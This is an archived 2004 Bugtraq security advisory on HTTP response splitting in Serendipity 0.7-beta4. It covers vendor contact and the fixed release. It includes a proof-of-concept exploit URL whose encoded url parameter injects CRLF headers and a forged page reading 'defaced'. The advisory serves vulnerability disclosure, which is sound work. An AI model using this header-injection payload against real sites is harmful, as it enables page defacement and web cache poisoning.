| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 21 Oct 2004 13:41:50 -0500 From: "Chaotic Evil" <chaoticevil@...ring.com> To: <bugtraq@...urityfocus.com> Subject: HTTP Response Splitting in Serendipity 0.7-beta4 SECURITY ADVISORY: HTTP Response Splitting in Serendipity 0.7-beta4 AUTHOR: Chaotic Evil (chaoticevil $$$at$$$ spyring $$$dot$$$ com) DATE: October 21st, 2004 PRODUCT: Serendipity 0.7-beta4 [October 14th, 2004 (Recommended release, most stable)] - www.s9y.org FROM THE VENDOR WEBSITE: Serendipity is a weblog/blog system, implemented with PHP. It is standards compliant, feature rich and open source (BSD License). SECURITY VULNERABILITY HTTP Response Splitting [1]. EXPLOIT: (observe that the url parameter is Base64-encoded, then URL-encoded) http://SERVER/serendipity/exit.php?url=DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb 250ZW50LUxlbmd0aDogMA0KDQpIVFRQLzEuMCAyMDAgT0sNCkNvbnRlbnQtTGVuZ3RoOiAyMQ0KQ 29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCg0KPGh0bWw%2bKmRlZmFjZWQqPC9odG1sPg%3d%3d VENDOR STATUS: Vendor contacted October 14th. Vendor worked closely with the author and promptly produced a fix (see below). FIX: Use version 0.7rc1 (downloadable at http://www.s9y.org/12.html) REFERENCES: [1] "'Divide and Conquer' - HTTP Response Splitting, Web Cache Poisoning attacks, and Related Topics" by Amit Klein, dated March 4th, 2004 http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pd f _____________________________________________ Free email with personality! Over 200 domains! http://www.MyOwnEmail.com
Powered by blists - more mailing lists